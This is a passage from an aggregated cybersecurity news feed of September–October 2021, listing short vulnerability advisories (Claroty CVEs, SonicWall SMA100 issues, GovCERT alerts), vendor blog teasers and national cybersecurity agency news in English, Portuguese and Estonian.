CWE-123 WRITE-WHAT-WHERE CONDITION: The affected product is vulnerable to a unsanitized extract folder for system configuration. A low-privileged user can leverage this logic to overwrite the settings and other key functionality.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22439
CVE-2021-42536
2021-10-05T00:00:00Z | 1633392000

CWE-200 EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR :The affected product is vulnerable to a disclosure of peer username and password by allowing all users access to read global variables.

https://claroty.com/team82/disclosure-dashboard/cve-2021-10073
CVE-2021-38485
2021-10-05T00:00:00Z | 1633392000

CWE-20 IMPROPER VALIDATION: The affected product is vulnerable to improper input validation in the restore file. This enables an attacker to provide malicious config files to replace any file on disk.

https://claroty.com/team82/disclosure-dashboard/cve-2021-03554
Holiday Readiness, Part Three: What you Should be Thinking About Two Months Out?Performance Optimizations
2021-10-04T22:02:00Z | 1633384920

October is here, and that means we are less than two months away from the busiest weekend of the year. Parts one and two of the Holiday Readiness blog series covered topics ranging from security checklists to disaster recovery strategies and flash crowd management. If you haven?t had a chance to review those topics and checklists, now is a critical time to start to ensure you are ready for the traffic rush the holiday season brings.

https://www.akamai.com/blog/trends/holiday-preparedness-things-to-think-about-2-months-out-performance-configurations
EAA Client Escalation of Privilege Vulnerability on Windows
2021-10-04T20:13:00Z | 1633378380

This post covers the details of CVE-2021-40683 (CVSS 6.5), the vulnerability impacting the Akamai Enterprise Application Access (EAA) Client running on Windows systems, for which Akamai has provided a patch to its customers.

https://www.akamai.com/blog/news/eaa-client-escalation-of-privilege-vulnerability
High Threat Security Alert (A21-10-01): Multiple vulnerabilities in Google Chrome
2021-10-04T04:00:00Z | 1633320000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-10-02): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-10-04T04:00:00Z | 1633320000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Equipa portuguesa alcança 7º lugar no European Cybersecurity Challenge 2021
2021-10-01T00:00:00Z | 1633046400

Os resultados da competição promovida pela Agência Europeia para a Cibersegurança (ENISA) já são conhecidos e Portugal destaca-se no 7º lugar do ranking europeu.Trata-se de uma competição que reúne jovens talentos de toda a Europa e decorre num ambiente de fair play. Ao longo de quatro dias, as equipas de cada País são desafiadas a resolver desafios complexos relacionados com segurança informática, desde a segurança da web, segurança de dispositivos móveis, criptografia, engenharia reversa, engenharia social e análise forense, num formato de acumulação de pontos. Recorde-se que o European Cyber Security Challenge 2021 contou com a participação de 19 países, mais de 200 jovens talentos em competição, 350 participantes e 120 especialistas na área de Cibersegurança. Portugal competiu com uma equipa constituída por 10 jovens talentos nacionais, selecionados no âmbito da iniciativa “Cyber Security Challenge PT”. Esta iniciativa resulta de uma estreita cooperação entre o Centro Nacional de Cibersegurança, o Instituto Superior Técnico, a Universidade do Porto e conta com o apoio da AP2SI-Associação Portuguesa para a Promoção da Segurança da Informação, além do suporte do Consórcio Centro Internet Segura. Trata-se de uma iniciativa que se insere no eixo Educação do programa INCoDe.2030, visando treinar e formar as camadas mais jovens da população através do estímulo e reforço nos domínios da literacia digital e das competências digitais em todos os ciclos de ensino e de aprendizagem ao longo da vida. De referir ainda que, anualmente, o “Cyber Security Challenge PT” promove uma competição de “Capture The Flag” (CTF), integrada na conferência anual C-Days, onde os participantes testam as suas competências nas várias áreas da segurança informática. Esta competição faz a seleção de uma equipa de 10 estudantes, entre os 15 e 26 anos, para representar Portugal no “European Cyber Security Challenge” e outras provas internacionais. De notar que na última competição do European Cyber Security Challenge, ocorrida em 2019, Portugal ficou classificado em 10º Lugar num total de 20 Países em competição, tendo sido esta a primeira participação portuguesa nesta competição internacional.

https://dyn.cncs.gov.pt/pt/detalhe/art/135588/equipa-portuguesa-alcanca-7-lugar-no-european-cybersecurity-challenge-2021
Mês Europeu da Cibersegurança, ECSM2021, começa hoje!
2021-10-01T00:00:00Z | 1633046400

A campanha do Mês Europeu da Cibersegurança é coordenada pela Agência da União Europeia para a Cibersegurança (ENISA), pela Comissão Europeia, e apoiada pelos Estados-Membros da UE e centenas de parceiros (governos, universidades, grupos de reflexão, ONGs, associações profissionais, empresas do sector privado) da Europa, e não só. Desde o primeiro evento em 2012, o Mês Europeu da Cibersegurança tem vindo a atingir as suas principais prioridades ao reunir entidades de toda a Europa sob o lema "Cibersegurança é uma Responsabilidade Partilhada", de modo a unir todos contra as ameaças no ciberespaço. Este ano, à semelhança do ano anterior, o mote adotado é "Think Before U Click' #ThinkB4Uclick" e os dois temas da campanha são: •    Primeiros socorros - orientações sobre o que fazer se alguém for vítima de um ciberataque;•    Esteja ciberseguro em casa. Os principais objetivos da campanha de 2021 são garantir que os utilizadores e organizações estejam bem informados sobre os potenciais riscos de cibersegurança e que se mantenham seguros online. A intenção geral é ajudar a desenvolver uma compreensão básica dos diferentes tipos de questões de segurança e privacidade online. Este ano teremos dois embaixadores que darão voz a esta iniciativa. Eles são Catarina Miranda, locutora de rádio e Criadora de conteúdos digitais, e Miguel Raposo, Diretor de Marketing. Ao longo do mês, o Centro Nacional de Cibersegurança irá dinamizar os materiais desenvolvidos pela ENISA, pelo próprio CNCS e os embaixadores. Esta campanha será divulgada nas nossas plataformas de redes sociais.Para kick-off do mês teremos a divulgação de um vídeo do Coordenador do CNCS, Lino Santos, e outro dos embaixadores acima referidos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135587/mes-europeu-da-ciberseguranca-ecsm2021-comeca-hoje
Criminals phishing Finnish bank details – Tips for the safe use of services
2021-09-30T06:03:41Z | 1632981821

The Social Insurance Institution of Finland (Kela), the National Bureau of Investigation (NBI) and the National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency advice people to be careful when logging in to online services. Criminals are phishing banking credentials by contacting people in the name of Finnish banks and My Kanta Pages. Stay safe when using services online and learn to spot scams. Warn your family and friends about scams.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/rikolliset-urkkivat-suomalaisten-pankkitunnuksia
Criminals phishing Finnish bank details – Tips for the safe use of services
2021-09-30T06:03:41Z | 1632981821

The Social Insurance Institution of Finland (Kela), the National Bureau of Investigation (NBI) and the National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency advice people to be careful when logging in to online services. Criminals are phishing banking credentials by contacting people in the name of Finnish banks and My Kanta Pages. Stay safe when using services online and learn to spot scams. Warn your family and friends about scams.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/rikolliset-urkkivat-suomalaisten-pankkitunnuksia
Lançado Boletim nº 4/2021 do Observatório de Cibersegurança
2021-09-30T00:00:00Z | 1632960000

O Boletim nº 4/2021, do Observatório de Cibersegurança, lançado hoje, tem como tema o volume e tipo dominante de incidentes registados pelo CERT.PT durante o primeiro semestre de 2021, comparando com o mesmo período de 2020 e 2019, considerando a pandemia de Covid-19 e os confinamentos sociais que a acompanharam. Nesta análise, destacam-se em particular o papel do fator humano e da engenharia social nas metodologias de ataque utilizadas.É possível ainda consultar notícias e publicações de interesse. Pode aceder ao documento aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/135586/lancado-boletim-n-42021-do-observatorio-de-ciberseguranca
Fixing a Security Bug by Changing a Function Signature
2021-09-29T14:48:28Z | 1632926908

Or: The C Language Itself is a Security Risk, Exhibit #958,738 This post is aimed at people who are developers but who do not know C or low-level details … Read more

https://blog.mozilla.org/attack-and-defense/2021/09/29/fixing-a-security-bug-by-changing-a-function-signature/
Attacking a Macro Security Problem with Micro-segmentation
2021-09-29T10:04:00Z | 1632909840

Ransomware is everywhere. And the shift of workloads to the cloud and employees to work-from-home models has only expanded the attack surface, creating new opportunities for attackers to leverage. Companies need Zero Trust solutions that not only defend against threat actors gaining access to enterprise systems, but also mitigate the impact of infections that slip through the cracks.

https://www.akamai.com/blog/security/attacking-a-macro-security-problem-with-micro-segmentation
Equipa portuguesa no European Cybersecurity Challenge 2021
2021-09-28T00:00:00Z | 1632787200

Tem início amanhã a competição “European Cyber Security Challenge 2021” (ECSC), em Praga – República Checa, promovida pela Agência Europeia para a Cibersegurança (ENISA). Portugal é uma das 18 equipas em competição.O European Cyber Security Challenge é uma competição, organizada pela ENISA, que reúne jovens talentos de toda a Europa e decorre num ambiente de fair play. Ao longo de quatro dias, as equipas de cada país são desafiadas a resolver desafios complexos relacionados com segurança informática, desde a segurança da web, segurança de dispositivos móveis, criptografia, engenharia reversa, engenharia social e análise forense, num formato de acumulação de pontos. O European Cyber Security Challenge 2021, que se inicia hoje em Praga – República Checa, conta com a participação de mais de 18 países, mais de 200 jovens talentos em competição, 350 participantes e 120 especialistas na área de Cibersegurança. Portugal competirá com uma equipa de 10 jovens talentos nacionais, selecionados pela iniciativa “Cyber Security Challenge PT”. Esta iniciativa resulta de uma estreita cooperação entre o Centro Nacional de Cibersegurança, o Instituto Superior Técnico, a Universidade do Porto e conta com o apoio da AP2SI-Associação Portuguesa para a Promoção da Segurança da Informação e suporte do Consórcio Centro Internet Segura. Trata-se de uma iniciativa que se insere no eixo Educação do programa INCoDe.2030, que visa treinar e formar as camadas mais jovens da população através do estímulo e reforço nos domínios da literacia digital e das competências digitais em todos os ciclos de ensino e de aprendizagem ao longo da vida. Anualmente, o “Cyber Security Challenge PT” promove uma competição de “Capture The Flag” (CTF), integrada na conferência anual C-Days, onde os participantes testam as suas competências nas várias áreas da segurança informática. Esta competição resulta na seleção de uma equipa de 10 estudantes, entre os 15 e 26 anos, para representar Portugal no “European Cyber Security Challenge” e outras provas internacionais. De notar que na última competição do European Cyber Security Challenge, ocorrida em 2019, Portugal ficou classificado em 10º Lugar num total de 20 Países em competição, tendo sido esta a primeira participação portuguesa nesta competição internacional.

https://dyn.cncs.gov.pt/pt/detalhe/art/135585/equipa-portuguesa-no-european-cybersecurity-challenge-2021
FIRST POST: September 2021
2021-09-28T00:00:00Z | 1632787200

Norwegian members of FIRST to host a technical colloquium in Oslo in November; More FIRST events to add to your calendar; The FIRST Board of Directors meets across two continents to build our two-year business plan; Empowering Women in Cybersecurity: ITU, FIRST, and EQUALS Global Mentorship Pilot Program concludes; 16 more member teams join FIRST;

https://www.first.org/newsroom/newsletters/FIRST_POST_Sep2021.pdf
High Threat Security Alert (A21-09-22): Vulnerability in Google Chrome
2021-09-27T04:00:00Z | 1632715200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-09-23): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-09-27T04:00:00Z | 1632715200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-09-24): Multiple Vulnerabilities in SonicWall SMA 100 Series Products
2021-09-27T04:00:00Z | 1632715200

SonicWall has released a security advisory to address multiple vulnerabilities in SMA 100 series products.

https://www.govcert.gov.hk/en/alerts_detail.php
The world’s first SASE Roast is on
2021-09-26T09:27:07Z | 1632648427

The post The world’s first SASE Roast is on appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-93
MKM: Valitsus suunab 2022. aastal täiendavad 30 miljonit eurot digiriigi ja küberturvalisuse kindlustamisse
2021-09-24T05:45:07Z | 1632462307

Valitsus eraldab 2022. aasta riigieelarvest täiendavad 30 miljonit eurot digiriigi kestlikkuse ja küberturvalisuse kindlustamiseks.

https://ria.ee/uudised/mkm-valitsus-suunab-2022-aastal-taiendavad-30-miljonit-eurot-digiriigi-ja-kuberturvalisuse
High Threat Security Alert (A21-09-21): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-09-24T04:00:00Z | 1632456000

Apple has released iOS 12.5.5 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Assinatura do acordo de consórcio de criação do C-Hub: Polo de Inovação Digital de Cibersegurança
2021-09-24T00:00:00Z | 1632441600

Após reconhecimento como Polo de Inovação Digital para integração na Rede Nacional e sua designação para acesso à Rede Europeia, foi no dia 23 de setembro formalizado o consórcio C-Hub: Cybersecurity DIH, que integra o CNCS - Centro Nacional de Cibersegurança, enquanto entidade coordenadora, e ainda as entidades AMA – Agência para a Modernização Administrativa, I.P.; C3P – Centro de Competências em Cibersegurança e Privacidade da Universidade do Porto; INOV - Instituto de Engenharia de Sistemas e Computadores Inovação; TICE.PT – Polo das Tecnologias de Informação, Comunicação e Electrónica; e PricewaterhouseCoopers/ AG – Assessoria de Gestão, Lda. A transformação digital em Portugal, nomeadamente a implementação de novas tecnologias digitais, levantou novos desafios na esfera da Cibersegurança, sendo as tecnologias emergentes, como o 5G, a Inteligência Artificial, a difusão da Internet das coisas (IoT) e a computação em nuvem, potenciadoras de um aumento da superfície e vetores de ataque, revelando-se como áreas críticas em relação às quais deve existir uma especial atenção em matéria de Cibersegurança. O C-Hub: Cybersecurity DIH, integrando áreas de conhecimento multidisciplinares, pretende assumir-se como uma referência nacional e europeia para uma abordagem neutra, rápida e segura das organizações, nomeadamente da Administração Pública (AP) e do setor privado, em particular as micro, pequenas e médias empresas (PME), na implementação de processos de transformação digital com enfoque nas áreas de Cibersegurança, através da prestação de serviços inovadores, aconselhamento e planeamento. Deste modo, permite-se que as organizações se tornem mais dinâmicas e competitivas nas suas áreas de negócio e nos seus processos de produção, produtos e serviços com recurso às tecnologias e ambientes digitais, numa lógica de testar antes de investir e de procura de soluções inovadoras.

https://dyn.cncs.gov.pt/pt/detalhe/art/135584/assinatura-do-acordo-de-consorcio-de-criacao-do-c-hub-polo-de-inovacao-digital-de-ciberseguranca
Authenticated SMA100 Arbitrary Command Injection Vulnerability
2021-09-23T21:29:13Z | 1632432553

Improper neutralization of special elements in the SMA100 management interface allows a remote authenticated attacker to inject arbitrary commands as a 'nobody' user, which could potentially lead to code execution. CVE: CVE-2021-20035 Last updated: April 15, 2025, 3:50 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0022
Unauthenticated SMA100 arbitrary file delete vulnerability
2021-09-23T21:24:58Z | 1632432298

An improper access control vulnerability in SMA100 allows a remote unauthenticated attacker to bypass the path traversal checks and delete an arbitrary file potentially resulting in a reboot to factory default settings. CVE: CVE-2021-20034 Last updated: Sept. 23, 2021, 9:24 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0021
Security Weakness Resulting in Potential Local Privilege Escalation When HA (High Availability) is Active
2021-09-23T21:20:54Z | 1632432054

A weakness in the SMA100 Series exists when High Availability (HA) pair is active, potentially permitting an operation at a privilege's level that is higher than the minimum level required. If a malicious actor obtains a 'nobody' user shell on an impacted SMA100 device, this can potentially lead to commands being executed with root-level privilege. This is a SMA100 series security weakness, not a vulnerability that can be exploited remotely.  CVE: N/A Last updated: Sept. 23, 2021, 9:20 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0020
MKM: Valitsus eraldas 2 miljonit eurot riigivõrgu turvalisuse tõstmiseks
2021-09-23T13:59:10Z | 1632405550

Valitsus otsustas tänasel istungil eraldada Vabariigi Valitsuse reservist 2 miljonit eurot, et teha täiendavaid investeeringuid riigivõrgu turvalisuse tõstmiseks.

https://ria.ee/uudised/mkm-valitsus-eraldas-2-miljonit-eurot-riigivorgu-turvalisuse-tostmiseks
Monitoring Our Hay Storage with Edge Connect and Machine Learning
2021-09-23T07:00:00Z | 1632380400

What do hay storage, Akamai?s Edge Connect solution, and machine learning have in common? We use the serverless machine learning system to keep our hay storage safe and secure.

https://www.akamai.com/blog/edge/monitoring-our-hay-storage-with-edge-connect-and-machine-learnin
Security Alert (A21-09-18): Multiple vulnerabilities in Google Chrome
2021-09-23T04:00:00Z | 1632369600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-19): Multiple Vulnerabilities in VMware Products
2021-09-23T04:00:00Z | 1632369600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-20): Multiple Vulnerabilities in Cisco Products
2021-09-23T04:00:00Z | 1632369600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
D-LINK DIR-3040 WiFi Smart Mesh information disclosure vulnerability
2021-09-23T00:00:00Z | 1632355200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1361
CVE-2021-22650
2021-09-23T00:00:00Z | 1632355200

An attacker may use TWinSoft and a malicious source project file (TPG) to extract files on machine executing TWinSoft, which could lead to code execution.Read Team82's report: Claroty Uncovers Vulnerabilities in TBox RTUs. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-22650
Akamai Named a Gartner Magic Quadrant Leader for Web Application and API Protection
2021-09-22T18:00:00Z | 1632333600

This week, Gartner released its new 2021 Magic Quadrant for Web Application and API Protection (WAAP) report, which replaces the Magic Quadrant for Web Application Firewalls (WAF) report, and Akamai has been named a Leader. Akamai was named a Leader in the four previous WAF Magic Quadrants.

https://www.akamai.com/blog/news/akamai-named-a-gartner-magic-quadrant-leader-for-web-application-and-api-protection
WAN Overlay and Underlay Projects: Better Together?
2021-09-22T17:36:05Z | 1632332165

The post WAN Overlay and Underlay Projects: Better Together? appeared first on Cato Networks.

https://www.catonetworks.com/resources/wan-overlay-and-underlay-projects-better-together/
Autodiscovering the Great Leak
2021-09-22T13:00:00Z | 1632315600

See the most recent research from Amit Serper on a vulnerability in Autodiscover from Microsoft Outlook that affects credential leaks.

https://www.akamai.com/blog/security/autodiscovering-the-great-leak
Changing cyber weather in August: Flubot subsided and sun glimmered through rain spells
2021-09-21T13:12:48Z | 1632229968

August saw the full range of cyber weather phenomena. The sun came out after no new reports were received about Flubot and we removed the alert that was valid all through the summer. The aggressive phishing of banking credentials continues. The campaigns have caused considerable financial losses to private persons. The data breach that occurred a year ago at the Vastaamo psychotherapy centre is also still causing trouble.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_elokuu_2021
Changing cyber weather in August: Flubot subsided and sun glimmered through rain spells
2021-09-21T13:12:48Z | 1632229968

August saw the full range of cyber weather phenomena. The sun came out after no new reports were received about Flubot and we removed the alert that was valid all through the summer. The aggressive phishing of banking credentials continues. The campaigns have caused considerable financial losses to private persons. The data breach that occurred a year ago at the Vastaamo psychotherapy centre is also still causing trouble.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_elokuu_2021
What Is a TCP Three-Way Handshake?
2021-09-21T13:00:00Z | 1632229200

The TCP three-way handshake is one of the critical building blocks of the internet. It facilitates the smooth and consistent flow of information across and among different networks without compromising security.

https://www.akamai.com/blog/security/tcp-three-way-handshake
Security Alert (A21-09-17): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-09-21T04:00:00Z | 1632196800

Apple has released iOS 15 and iPadOS 15 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
SonicWall Global VPN Client Privilege Escalation via Application Installer
2021-09-21T00:20:04Z | 1632183604

SonicWall Global VPN Client 4.10.5 installer (32-bit and 64-bit) incorrect default file permission vulnerability leads to privilege escalation which potentially allows command execution in the host operating system. This vulnerability impacts 4.10.5 installer and earlier. CVE: CVE-2021-20037 Last updated: Sept. 21, 2021, 12:20 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0024
Inscrições encerradas para a 2ª edição do Curso Geral de Ciber-higiene
2021-09-21T00:00:00Z | 1632182400

Trata-se de um curso curto, composto por dois módulos, “Ciber(in)segurança” e “Ciber-higiene e Boas Práticas de Cibersegurança”, com a duração total aproximada de duas horas. Dividido em dois módulos que abordarão não só alguns dos potenciais riscos no uso da Internet, como também a partilha de algumas dicas e boas práticas que deverá adotar diariamente para se proteger. Desta forma, o objetivo do curso passa por despertar nos formandos o espírito crítico e a sensibilidade para as características do ciberespaço e para a forma como o usamos. Para isso, pretende-se capacitar os formandos com algumas boas práticas de ciber-higiene, e ainda, promover o uso informado e seguro do ciberespaço, com recurso à abordagem de temas como o email, redes sociais ou a criação de uma password segura. Recorde-se que o curso está aberto a todos os interessados na temática, independentemente dos conhecimentos que detenham sobre o tema. No final do Curso Geral de Ciberhigiene os participantes receberão um Certificado de conclusão. O limite de inscrições para esta ação de formação já foi atingido.

https://dyn.cncs.gov.pt/pt/detalhe/art/135582/inscricoes-encerradas-para-a-2-edicao-do-curso-geral-de-ciber-higiene
NCSC-NL cordially invites you to its research symposium Let’s do Cybersecurity Research Together
2021-09-20T09:34:00Z | 1632130440

At NCSC-NL we believe that better cybersecurity incident response requires more cooperation and research. Therefore, we proudly announce our upcoming research symposium Let’s Do Cybersecurity Research Together. This event is all about connecting multidisciplinary academic and applied cybersecurity research(ers) with professionals dealing with cybersecurity issues and incidents on a daily basis.

https://english.ncsc.nl/latest/news/2021/september/20/ncsc-nl-cordially-invites-you-to-its-research-symposium-lets-do-cybersecurity-research-together
Security Alert (A21-09-16): Multiple Vulnerabilities in Apache HTTP Server
2021-09-20T04:00:00Z | 1632110400

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Estudo sobre os Profissionais de Cibersegurança e Segurança da Informação em Portugal (AP2SI)
2021-09-20T00:00:00Z | 1632096000

A AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação, com o apoio do Observatório de Cibersegurança do Centro Nacional de Cibersegurança, lançou a 2ª Edição do Estudo sobre os Profissionais de Cibersegurança e Segurança da Informação em Portugal, com o objetivo de compreender melhor o perfil e o contexto de trabalho dos profissionais desta área.Os dados recolhidos permitirão estabelecer comparações com a 1ª Edição, lançada em 2019, também com o apoio do Observatório de Cibersegurança, e compreender as características de uma profissão cada vez mais relevante.Se é um profissional de Cibersegurança e Segurança da Informação, responda ao questionário e ajude-nos a conhecer melhor esta atividade. O questionário estará disponível entre os dias 20 e 30 de Setembro aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135583/estudo-sobre-os-profissionais-de-ciberseguranca-e-seguranca-da-informacao-em-portugal-ap2si
DDoS Chart Toppers?BPS, PPS and RPS Greatest Hits
2021-09-17T13:00:00Z | 1631883600

New to the scene, monster-sized botnet M?ris is raising some eyebrows with giant requests per second (rps) attacks as shared by Cloudflare (17.2M rps, reported August 19), Yandex (peaking at 21.8M rps on September 5), and KrebsOnSecurity (2M rps on September 9). Some commentary came in on Slashdot, The Record, and The Hacker News.

https://www.akamai.com/blog/security/ddos-chart-toppers-bps-pps-and-rps-greatest-hits
NCSC-FI issues updated cookie guidance
2021-09-17T12:17:44Z | 1631881064

The National Cyber Security Centre Finland (NCSC-FI) has updated its guidance on storing cookies and other data on the use of services on users’ terminal devices and using data stored on such devices. This will help the users and providers of online services to understand and apply cookie practices and legislation.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-issues-updated-cookie-guidance
NCSC-FI issues updated cookie guidance
2021-09-17T12:17:44Z | 1631881064

The National Cyber Security Centre Finland (NCSC-FI) has updated its guidance on storing cookies and other data on the use of services on users’ terminal devices and using data stored on such devices. This will help the users and providers of online services to understand and apply cookie practices and legislation.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-issues-updated-cookie-guidance
Learn How Akamai Enables AI Powered Analytics Tools to Reduce Water Losses
2021-09-17T07:00:00Z | 1631862000

The Accelerator Program, a flagship initiative of Akamai India?s Corporate Social Responsibility Trust, enables early-stage innovations for water conservation. Over the past two years, along with our mentoring partner, the International Center for Clean Water (ICCW; an initiative of the Indian Institute of Technology Madras), we onboarded two social innovators as Cohort 1 grantees: Ashoka Trust for Research in Ecology and the Environment and Foundation for Environmental Monitoring, and two social innovators as Cohort 2 grantees, SmartTerra and Jaljeevika.

https://www.akamai.com/blog/culture/learn-how-akamai-enables-ai-powered-analytics-tools-to-reduce-wa
Security Alert (A21-09-14): Multiple Vulnerabilities in Drupal
2021-09-17T04:00:00Z | 1631851200

Drupal has released a security advisory to address multiple vulnerabilities in the JSON:API, Media, QuickEdit and REST File upload modules.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-09-15): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-09-17T04:00:00Z | 1631851200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Kinsing evolves, adds Windows to attack list
2021-09-16T13:00:00Z | 1631797200

The campaign was first seen by the Akamai SIRT on February 16, 2021, and appears to be targeting both Windows and Linux systems. The botnet caught our interest because it has shown to be highly active across a diverse set of geographical regions, including the Americas, Europe, and Asia.

https://www.akamai.com/blog/security/Kinsing-evolves-adds-windows-to-attack-list
Capoae Malware Ramps Up: Uses Multiple Vulnerabilities and Tactics to Spread
2021-09-16T13:00:00Z | 1631797200

Recently, there has been a plethora of UPX packed crypto-mining malware written in Golang targeting Linux systems and web applications popping up in the news. The malware?s primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they?ve been infected, these systems are then used to mine cryptocurrency. I?ve named the sample I examined for this post ?Capoae,? based on the code?s output to my terminal.

https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread
Security by Behavioural Design: A Rapid Review
2021-09-16T07:24:00Z | 1631777040

In 2021, NCSC-NL commissioned Leiden University to carry out a rapid review to gain insight in best practices and potential future research avenues so that behavioural science can be integrated in broader security by design methodologies and projects. This academic field is referred to as security by behavioural design. The aim of security by behavioural design is to design systems in such a way that the user of these systems is more likely to behave in a secure manner. The goal of this rapid review was to cover the research that empirically tests the effectiveness of various methods. The methods covered are nudging or also called choice architecture, and techno-regulation[1].

https://english.ncsc.nl/latest/news/2021/september/16/security-by-behavioural-design-a-rapid-review
Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks
2021-09-15T07:00:00Z | 1631689200

Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.

https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection-cve-2021-26084
Akamai?s Flagship Customer Enablement Program, Akamai University, Wins Gold ?Excellence in Learning? Award
2021-09-15T07:00:00Z | 1631689200

The Technical Enablement and Education team, part of Akamai?s Global Services organization, has won a coveted Brandon Hall Group Gold award for ?Best Customer Training Program,? for Akamai?s flagship customer training and enablement program, Akamai University.

https://www.akamai.com/blog/news/akamai-s-flagship-customer-enablement-program--akamai-university
High Threat Security Alert (A21-09-12): Multiple Vulnerabilities in Microsoft Products (September 2021)
2021-09-15T04:00:00Z | 1631678400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-13): Multiple Vulnerabilities in Adobe Reader/Acrobat
2021-09-15T04:00:00Z | 1631678400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Now Live: On-Demand Learning and Hands-On Labs at Learn Akamai
2021-09-14T07:00:00Z | 1631602800

I?m excited to announce our new all-inclusive Learning Hub as the single destination for all product learning resources at Akamai. This new Hub gives users the ability to choose the method of learning that suits them best, whether that?s reading through technical documentation, exploring our on-demand elearning modules and hands-on labs, or joining a community discussion.

https://www.akamai.com/blog/news/now-live--on-demand-learning-and-hands-on-labs-at-learn-akamai
High Threat Security Alert (A21-09-09): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-09-14T04:00:00Z | 1631592000

Apple has released iOS 14.8 and iPadOS 14.8 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-09-10): Multiple vulnerabilities in Google Chrome
2021-09-14T04:00:00Z | 1631592000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-09-11): Vulnerability in Microsoft Edge (Chromium-based)
2021-09-14T04:00:00Z | 1631592000

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Azure Sphere Security Monitor SMSyscallPeripheralAcquire information disclosure vulnerability
2021-09-14T00:00:00Z | 1631577600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1309
CVE-2021-37193
2021-09-14T00:00:00Z | 1631577600

CWE-471: Modification of Assumed-Immutable Data (MAID)Successful exploitation of these vulnerabilities could allow an unauthorized remote attacker to retrieve or manipulate sensitive information from the affected software. In addition, the attacker could also cause a denial-of-service condition in devices controlled by the affected software.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37193
CVE-2021-37192
2021-09-14T00:00:00Z | 1631577600

CWE-200: Exposure of Sensitive Information to an Unauthorized ActorSuccessful exploitation of these vulnerabilities could allow an unauthorized remote attacker to retrieve or manipulate sensitive information from the affected software. In addition, the attacker could also cause a denial-of-service condition in devices controlled by the affected software.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37192
CVE-2021-37191
2021-09-14T00:00:00Z | 1631577600

CWE-799: Improper Control of Interaction Frequency Successful exploitation of these vulnerabilities could allow an unauthorized remote attacker to retrieve or manipulate sensitive information from the affected software. In addition, the attacker could also cause a denial-of-service condition in devices controlled by the affected software.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37191
CVE-2021-37190
2021-09-14T00:00:00Z | 1631577600

